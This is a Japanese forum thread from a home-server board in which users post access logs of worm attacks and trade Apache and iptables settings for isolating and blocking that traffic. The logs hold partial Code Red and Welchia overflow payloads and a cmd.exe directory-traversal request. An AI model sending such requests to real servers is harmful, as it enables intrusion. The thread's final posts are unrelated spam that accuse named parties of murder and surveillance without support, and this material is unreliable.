12:57:34 67.115.71.91 - "" SEARCH / - 411 - 2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 - 2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 - うちのSnortSnarfの警告ページね。 2つの異なるイグネチャーが219.96.206.60として存在しています。発信源 ・65個の事例はWEB-IIS ISAPI .ida attempt ・65個の事例はWEB-IIS cmd.exe access ここ学校なんだよね〜 あまりにウザイからwhoisでわざわざ調べて メールで教えてあげようと思ったら。 failure noticeときたもんだ! 管理ちゃんとしようよー >>234 219.96.206.60 = haruna.kibou.ed.jp 適当にpostmaster@とかwebmaster@に送ってみたらどうよ いまだにcoderedとかに感染している奴氏んでしまえばいいのに WINNTAutoAttackっていうんですかこれ? 221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8% u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 (以下略) 中国人かな? taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404 http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html Hacktool.WKRShell セキュリティホール memo http://www.st.ryukoku.ac.jp/ ~kjm/security/memo/ Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049) http://www.st.ryukoku.ac.jp/ ~kjm/security/memo/#20031112_MS03-049 EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12) http://www.st.ryukoku.ac.jp/ ~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html MS03-049が危険な理由 (ZDNet) http://www.zdnet.co.jp/enterprise/0311/14/epn02.html 最近こんなのばっか 213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 誰か対処法教えて…ログがわけわかんなくなる ウチは、ルータで Directed Broadcast 破棄しといた 65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -% アメリカより。 >>245 うちのルータもpingを排除したら迷惑な香具師も少なくなりますた 一日1500くらいアタックがくるよ。 一分に一回程度。 やんなっちゃう。 真っ当なアクセスなら1500って夢のような数字だけどさ ルータ新しいのにかえようかなあ pingを排除できるルータがあるんならかえたい。 けど、金ない。 よわったのお >>247 iptables -A INPUT -p icmp -i ppp+ -j DROP スレ違いレス なんかこのスレ見て自分の鯖が心配になってきた。 確認する方法と防ぐ方法きぼんぬ。 OSがWindowsならWindowsUpだて汁! 他のOSはシラネ >>249 鯖の電源切れば心配しなくてもよくなるYO 同じIPから毎日のように来るので 調べてみたらどうやらクライアント機らしい。 同じ時間帯に集中するのは、その時間帯に電源入れてるから。 updateやウイルスチェックぐらいしろと… 巛彡彡ミミミミミ彡彡 巛巛巛巛巛巛巛彡彡 r、r.r 、|::::: | r |_,|_,|_,||:::::: ⌒ ⌒| |_,|_,|_,|/⌒ -="- (-=" |_,|_,|_人そ(^i '"" ) ・ ・)""ヽ | ) ヽノ |. ┃`ー-ニ-イ`┃ そうでっか、そうでっか、なるほどね | `".`´ ノ ┃ ⌒ ┃| 人 入_ノ´ ┃ ┃ノ\ / \_/\\ ┗━━┛/ \\ / \ ト ───イ/ ヽヽ / ` ─┬─ イ i i / | Y | | / | ヽ__|_| 巛彡彡ミミミミミ彡彡 巛巛巛巛巛巛巛彡彡 r、r.r 、|::::: | r |_,|_,|_,||:::::: /' '\ | |_,|_,|_,|/⌒ (・ ) (・ )| |_,|_,|_人そ(^i ⌒ ) ・・)'⌒ヽ | ) ヽノ |. ┏━━━┓| | `".`´ ノ ┃ ノ ̄i ┃| 人 入_ノ´ ┃ヽニニノ┃ノ\ ・・・・で?seireiやnekoninがサービス悪いとでもいいたいの? / \_/\\ ┗━━┛/|\\ / \ ト ───イ/ ヽヽ / ` ─┬─ イ i i / | Y | >>247 1500アタック/日?普通だよ、普通。 >>249 FW・フィルタ付きのルータを導入し、SYSLOGを見れ。 最近、時々来る "GET /sumthin"が不気味だな。 200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-" >>257 それはサムスンの綴りを間違えたのです。 ってのは冗談で、 ググるとすこしはわかるかもしれませんよ。 ワームじゃないんだけど 韓国からのアクセスが多い、 ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね 鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、 一時間に3回ぐらいの割合で入ってる 毎回違う串さして同一人物がやってるんだろうか… 他にログが無くてこればっかり並んでるから激しく怖い Windows98のIE5.5を詐称するならワーム たしかWelchiaとかいう 218.108.238.159 - - [08/Mar/2004:19:26:05 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.79.212.100 - - [08/Mar/2004:20:58:49 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.13.247.16 - - [09/Mar/2004:12:23:38 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.84.159.6 - - [09/Mar/2004:12:53:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.0.209.6 - - [09/Mar/2004:15:06:01 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.13.49.63 - - [09/Mar/2004:15:51:22 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.23.96.176 - - [09/Mar/2004:16:07:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.94.194.252 - - [09/Mar/2004:22:55:53 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.29.237.46 - - [09/Mar/2004:23:47:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.235.111.183 - - [10/Mar/2004:08:45:59 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.46.6.210 - - [10/Mar/2004:09:27:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.51.241.47 - - [10/Mar/2004:10:11:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.178.173.142 - - [10/Mar/2004:15:35:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.210.180.3 - - [10/Mar/2004:18:02:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.92.10.199 - - [10/Mar/2004:18:59:06 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.232.181.151 - - [10/Mar/2004:21:36:15 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.92.205.94 - - [11/Mar/2004:03:39:46 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.61.20.56 - - [12/Mar/2004:01:41:09 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 219.133.182.176 - - [10/Mar/2004:13:48:10 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-" 219.145.4.26 - - [10/Mar/2004:20:28:03 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-" 219.133.125.221 - - [11/Mar/2004:00:34:39 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-" FTPでいろんなアカウントとパスを組み合わせてくるやつが居るけど、 あれは単に割れ鯖をさがしてるクローラー? usen-221x114x94x213.ap-us01.usen.ad.jp - - [22/Mar/2004:16:29:42 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0 2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0 2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1(ry ('-`).。oO(鬱陶しいことこの上ないのだが 220.145.233.60 - - [31/Mar/2004:10:29:15 +0900] "SEARCH /\x90\x02\ (ry 大量にキテル…しかも1リクエストに32Kbyteもある… 鯖ではないだろうけど、ウイルス対策くらいしっかりしてほしいなぁ ログを切り分けたいのですが上手くいかね。 SetEnvIf Request_URI "^/\\x90\\x02" worm nolog SetEnvIf Request_URI "^/\x90\x02" worm nolog アドバイスよろ。 >>267 ありがと,そっちのスレはチェックしてませんでした。 SetEnvIf じゃ分けれませんか(´・ω・`)ショボーン >>268 なんとな〜くだけど、vhost使って分けられそうな気がしない? 大抵のウィルスはhostを名乗らないので、別けられそうな気がする とか思いつつ、俺は放置してるわけだが いい機会なんで試してみたが、分離は可能でした 結果だけ報告 >>266 パイプ経由のロギングを利用するのはどうよ? CustomLog "|/root/sh/logfilter >> /var/log/httpd/access_log" combined env=!nolog とでもして、/root/sh/logfilterスクリプト内で"SEARCH /\x90\x02\…"は弾くようにするとか。 267のリンク先の814だが。 Mac 板の UNIX スレだか鯖スレだかにも書いたような気がするが、 <VirtualHost> で分離するのは当然有効。 ワーム以外にも踏台探しのアフォによるアクセスも隔離できることが多いのでオススメ。 あるいは、「異常なログを隔離する」ではなく、 CustomLog /dev/null common CustomLog /path/to/access_log combined env=REMOTE_ADDR のように、環境変数が正常にセットされているもののみ隔離するという方法でも できそうだが、これはうまくいくかどうかは試していない。 >>272 <VirtualHost>でhost名を知らないアクセス=ワームを分離する方法ですが、 これだとローカルからのIP直打ちアクセスも分離されてしまうんじゃないでしょうか。 わざわざ串を刺すのはちょっと…。 >>273 うちのルータ(というより*BSD箱だけど)はグローバルIPでアクセスしても応答してくれるから問題は無いし hosts に書くかDNS鯖に細工をすれば対処できませんか? それに自分のアクセスがログに記録されないぐらいならデバック時以外は被害は少ないと思われ 272だが。 IP 直打ちでも Host: にその IP アドレスが入るので、 プライベートアドレスを ServerAlias に指定すればよし。 NameVirtualHost * <VirtualHost *> ServerName dummy.host CustomLog [隔離ログ] ... </VirtualHost> <VirtualHost *> ServerName xxx.yyy.zzz ServerAlias localhost 127.0.0.1 192.168.0.1 ... CustomLog [ほんとのログ] ... </VirtualHost> このように設定すれば、Host: がないか、あってもグローバルの IP アドレスの場合は dummy.host の設定が使われる。 >>274-275 大変参考になりました。 で、>>261 他のログを分離できたとはいえ、そのままではログファイルを圧迫することに変わりないので アクセスログの書式も \"%r\" → \"%m %!414U %H\" として、414(HTTP_REQUEST_URI_TOO_LARGE)のときはURLを記録しないように、 ついでにクソ長いクエリ送ってくるワーム用にクエリ文字列を記録しないよう変更しました。 ワーム用の<VirtualHost>設定でDocumentRootを/dev/nullにしちゃうのはマズいでしょうか? SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90 で来るヤツって www のホスト名で来てませんか? >>276 レスありがとうございます。あれから調べてみたところ、どうやら/dev/nullや/dev/zeroといった 特殊デバイスはApacheではアクセスできないようになっているみたいですね。 実験的にDocumentRootに設定してみましたが、エラーログには [Tue Apr 6 12:34:56 2004] [error] [client xxx.xxx.xxx.xxx] object is not a file, directory or symlink: /dev/zero と、/var/hogeのように存在しないディレクトリを設定した時と同じエラーが記録されていました。 まあワームにわざわざディレクトリを用意するのも馬鹿らしいので、/dev/zero指定にしようと思います。 誘導されてきました. SEARCHとかのワーム攻撃を避けるために, NGSecureWeb for Linux http://canon-sol.jp/product/ng/index.html とか SRP(Secure Reverse Proxy) http://www.gomibako.com/ ~umesan/srp/ とか使ってる人います?役に立ちますかね? >>285 個人で鯖立ててる分には>>260 以降の対策で十分なので要らないな。 まあわざわざ製品を使おうと考えてるところを見ると、業務用なんだろうけど。 >>286 ここは自宅鯖板 で、名前にsageを入れる意味は何なんだろう 自宅で鯖っつか社長の趣味で意味無く鯖立てたとか 最近のウィルスによるアクセスはその人達が原因かな WOLでスタンバイにしているが、すぐに起動してしまうのは、ワームのせいなのかよ・・・。 ●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..● 無料のウイルス対策ソフトなどのセキュリティソフト一覧 http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html ●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...● 感染しているPCを持っているユーザーに通知してあげたい HPがあってメルアド書いててくれたら一番、楽なんだけどね Windowsのメッセージサービスだっけ? あれって日本語も通るんだっけ? 気づいてくれないかなぁ・・・ 218.114.60.82 - - [21/Jun/2004:21:55:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1042 "-" "-" >>296 messengerサービスは日本語通るよ。 ほらよ。 ワームの場合やポートスキャンなどのIPアドレスベースのアクセスは、クエリを ログに保存しない。かつ、すべてのリクエストを拒否する。 おまけで、拒否した403エラーをerror_logにも残さない。 LogFormat "%h %l %u %t \"%m %U %H\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" attacked LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" combined # Reject IP Adress Access <VirtualHost XXX.XXX.XXX.XXX:80> CustomLog logs/access_log attacked ErrorLog /dev/null <Directory ~ ".*"> Order deny,allow Deny from all </Directory> </VirtualHost> <VirtualHost XXX.XXX.XXX.XXX:80> ServerName www.example.com DocumentRoot /usr/local/apache/htdocs ServerAdmin webmaster@www.example.com CustomLog logs/example_access_log extended combined ErrorLog logs/example_error_log </VirtualHost> <VirtualHost XXX.XXX.XXX.XXX:80> … </VirtualHost> <VirtualHost XXX.XXX.XXX.XXX:80> … </VirtualHost> 218.88.235.240 - - [23/Jul/2004:03:00:50 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCC・・・ アクセスしてみたら中国のサイトみたいだけど・・・ >>301 それアタックツールじゃない? WinNTAutoAttackっていうやつ 203.205.99.199 - - [22/Jul/2004:01:33:57 +0900] "\xc8C\xc0\x1d" 501 - "-" "-" 203.205.99.199 - - [22/Jul/2004:01:34:44 +0900] "HZ\xc0\x1d" 501 - "-" "-" 203.205.99.199 - - [22/Jul/2004:01:38:12 +0900] "0\x9f\xc0\x1d" 501 - "-" "-" 最近、こういうのが来るようになったんですけど.... >>303 うちにも来てますね。同じようなの。 メソッドがなくて、リクエスト文字列はバラバラ。 なんらかのワームと思われますけど、 共通の指紋がなくて検索に掛からずいまだ正体不明です。 Googlebotってのが怖い・・・ 誰か助けて。 >>305 やべーよ、それに狙われたら終わりだよ。 個人情報全部抜かれてるよ、きっと。 >>305 うちなんかあえてGooglebotが来やすいように対策して 相手をはめてやろうと頑張ってるんだけど全然こないよ orz >>307 もしかして、昔、嘘教えられた人? Googlebotに来て欲しいなら、robots.txt に User-Agent: * Disallow: / て、書いちゃダメだよ。 人違いならイイんだけど、昔、検索サイトに登録されたいのでロボットに 来て欲しいという人に対して、上記ファイルを書けばロボットが来てくれる と嘘を教えた人が居たから。 今でも嘘を信じてロボットを待ってるとしたら可哀想で。。。 >308 スレ違い。 # robots.txt を置いて検索蹴っていたとしても、ロボットが来なくなる # わけじゃない。 # robots.txtは探すから。 # # それすら来ない(accessログに残っていない)なら、、、 # # # まぁ、イ` とだけ言っておこう。 先方へのお知らせ用のテンプレートってないでしょうかか? やられていると思われるサーバーから当方のサーバーに、 SSHで進入しようとしたログを見つけました。 国内のとある建築デザイン会社のネットワーク内からなんですが。 お知らせしてあげようかなと思うものの、 一からメール起こすのもなんだかなぁと。 jedle.ms.mff.cuni.cz - - [31/Jul/2004:01:10:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略) dns.520net.to - - [31/Jul/2004:15:58:28 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略) こんなんもいっぱい来る…って、ワームじゃなくて故意か(^^; Virtual Host の設定例ですよん。 NameVirtualHost * ## default (unknown) domain <VirtualHost *> ServerName localhost DocumentRoot /web/unknown ErrorLog "|bin\rotatelogs.exe logs/unknown/error_%Y%m%d.log 86400 540" CustomLog "|bin\rotatelogs.exe logs/unknown/access_%Y%m%d.log 86400 540" common HostnameLookups On <Directory "/web/unknown"> Options None AllowOverride None Order deny,allow Deny from all </Directory> </VirtualHost> ## abcdefg.com <VirtualHost *> ServerName abcdefg.com DocumentRoot /web/abcdefg.com ErrorLog "|bin\rotatelogs.exe logs/abcdefg.com/error_%Y%m%d.log 86400 540" CustomLog "|bin\rotatelogs.exe logs/abcdefg.com/access_%Y%m%d.log 86400 540" common <Directory "/web/abcdefg.com"> Options ExecCGI AllowOverride All Order allow,deny Allow from all </Directory> </VirtualHost> ## vwxyx.info <VirtualHost *> ServerName vwxyx.info DocumentRoot /web/vwxyx.info ErrorLog "|bin\rotatelogs.exe logs/vwxyx.info/error_%Y%m%d.log 86400 540" CustomLog "|bin\rotatelogs.exe logs/vwxyx.info/access_%Y%m%d.log 86400 540" common <Directory "/web/vwxyx.info"> Options ExecCGI AllowOverride All Order allow,deny Allow from all </Directory> </VirtualHost> 一個目の設定は二個目三個目の設定に合致しなかったときに評価されるので自然と IP 直打ちによるアクセスと判断可能。 そして、IP 直打ちは access deny に設定する。 web/unknown 自体も作成しない。 あとね、ログを取らないってのはやめたほうがいいと思う。 ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。 /web/unknownをdenyにすると、ワームのアクセスがあるたびに エラーログに client denied by server configuration: /web/unknown が残ってウザくないか? それがなぜかですね、 request failed: URI too long としか書かれてない。 >>313 > あとね、ログを取らないってのはやめたほうがいいと思う。 > ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。 言ってる事はもっともだ でも、最近普通のlogすらチェックしてる時間無くて… とりあえず、ありもしないページを要求してきたら、そのIP近辺はまとめてアクセス規制かけるようにしてる。 っつーかこのスレ来るような奴は基本的に分かってない。 219.157.121.142 こんなのが・・・・・ 219.154.151.29 219.154.8.152 219.154.151.29 YahooBB219037248174.bbtec.net 記念かきこんぶ 221.137.138.141 221.14.244.126 >>324 その通り。 努力が足りない非正規雇用の増加や、 正社員の中にもサービス残業が嫌だなどという甘えた輩が増えていることは その証拠でしょうね。 The genre began to expand near the turn of century with the development of dime novels and pulp magazines. , These are the people he feels at ease with, whose working methods he respects. , ∧_∧ ( ・∀・) 人 ガッ ( つ―-‐-‐-‐-‐-‐○ < >__Λ∩ 人 Y ノ. V`Д´)/ し(_) / ←>>114 1だが、このスレまだ残ってるんだな。 保守がてらあげておこう。 だめだって(~_~;)そとはだめ(。-_-。)はいきゅうみすですよこれはf^_^;) 【緊急】自衛隊内部で事件発生か!? 東海ア マ 北濱さんを殺害したのか? ニセモノよ! どこに遺体を埋めたんだ? https://twitter.com/tok aiama/status/779592042154299392 君らが北濱さんを殺害して遺体を埋めるとすれば信太山演習場だろうな https://twitter.com/tok aiama/status/779592576550567936 すぐにカマに引っかかってくれる、とても素直な性格だね 労せずして君たちが殺害犯であることがよく分かる 君たちの知能程度もよく分かる 君たちが消してしまった、北濱さんの自衛隊内イジメ記事への評論を見れば誰でも君たちが自衛隊員であることが分かる https://twitter.com/tok aiama/status/779600074561073152 「信太山演習場に遺体を埋めた」と書いた直後に急に激しく反応してるね 友人の自衛官に頼んで信太山演習場内に掘り返し跡がないか調べてもらう予定だったが、 そこまで反応すると真実性が高そうだ https://twitter.com/tok aiama/status/779602473660981248 とうとう北濱幹也のニセモノにブロックされてしまった 北濱さんの遺体を信太山演習場に埋めたと書いたら、もの凄い反応だった https://twitter.com/tok aiama/status/779608668136284160 20時5分 無言の不審電話がかかってきた たぶんニセ北濱グループだろうね いよいよ襲ってくるのかな? https://twitter.com/tok aiama/status/779637957649063937 私は元創価の会員でした。 すぐ隣に防衛省の背広組の官舎があるのですが、 自分の家の窓にUSB接続のwebカメラを貼り付けて、そこの動画を撮影し続け、 学会本部に送っていました。 別に大したものは写っていません。ゴミ出しとか奥さんが子供を遊ばせている所とか。 官舎が老朽化して使われなくなってから、 今まで法人税(うちは自営業です)をほぼ払わなくても済んでいたのが、 もう守ってやれないのでこれからは満額申告するように言われました。 納得がいかないと言うと、君は自業自得で餓鬼地獄へ落ちる、 朝夕南無妙法蓮華経と三千回ずつ唱えて心をきれいにしなさいと言われ 馬鹿らしくなって脱会しました。 それ以来、どこへ行くにもぞろ目ナンバーの車につけまわされたり大変な日々です。 全部自分の出来心から始まった事で、どこに訴えるわけにもいかないのですが、 なんとかあの人たちと縁を切った上で新しい始まりを迎える方法はないんだろうか。 read.cgi ver 07.5.5 2024/06/08 Walang Kapalit ★ | Donguri System Team 5ちゃんねる